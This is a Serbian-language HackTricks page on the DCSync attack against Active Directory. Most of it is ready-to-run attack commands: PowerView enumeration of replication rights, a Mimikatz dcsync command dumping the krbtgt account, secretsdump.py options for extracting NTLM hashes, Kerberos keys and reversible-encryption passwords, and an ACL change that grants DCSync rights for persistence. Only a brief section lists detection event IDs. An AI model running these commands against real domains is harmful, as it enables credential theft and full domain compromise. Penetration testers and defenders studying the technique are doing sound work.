DCSync

Koristite Trickest za lako kreiranje i automatizaciju radnih tokova pokretanih najnaprednijim alatima zajednice. Pribavite pristup danas:

Automate OffSec, EASM, and Custom Security Processes | Trickest

Podrška HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

DCSync

Dozvola DCSync podrazumeva posedovanje ovih dozvola nad samim domenom: DS-Replication-Get-Changes, Replicating Directory Changes All i Replicating Directory Changes In Filtered Set.

Važne napomene o DCSync:

DCSync napad simulira ponašanje Kontrolera domena i traži od drugih Kontrolera domena da repliciraju informacije koristeći Protokol za daljinsku replikaciju direktorijuma (MS-DRSR). Pošto je MS-DRSR validna i neophodna funkcija Active Directory-a, ne može se isključiti ili onemogućiti.
Po defaultu, samo grupe Domain Admins, Enterprise Admins, Administrators i Domain Controllers imaju potrebne privilegije.
Ako su lozinke bilo kojih naloga sačuvane sa reverzibilnom enkripcijom, dostupna je opcija u Mimikatz-u da vrati lozinku u čistom tekstu.

Enumeracija

Proverite ko ima ove dozvole koristeći powerview:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Iskoristi lokalno

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Eksploatiši na daljinu

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc generiše 3 datoteke:

jedna sa NTLM hešovima
jedna sa Kerberos ključevima
jedna sa lozinkama u čistom tekstu iz NTDS za bilo koje naloge postavljene sa reverzibilnom enkripcijom omogućenom. Možete dobiti korisnike sa reverzibilnom enkripcijom pomoću

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Persistencija

Ako ste administrator domena, možete dodeliti ove dozvole bilo kojem korisniku uz pomoć powerview:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

Zatim, možete proveriti da li je korisniku ispravno dodeljeno 3 privilegije tražeći ih u izlazu (trebalo bi da možete da vidite imena privilegija unutar polja "ObjectType"):

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Mitigation

Security Event ID 4662 (Audit Policy for object must be enabled) – Operacija je izvršena na objektu
Security Event ID 5136 (Audit Policy for object must be enabled) – Objekt usluge direktorijuma je izmenjen
Security Event ID 4670 (Audit Policy for object must be enabled) – Dozvole na objektu su promenjene
AD ACL Scanner - Kreirajte i uporedite izveštaje o ACL-ima. https://github.com/canix1/ADACLScanner

References

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Use Trickest to easily build and automate workflows powered by the world's most advanced community tools. Get Access Today:

Automate OffSec, EASM, and Custom Security Processes | Trickest

PreviousDCShadow NextDiamond Ticket

Last updated 4 months ago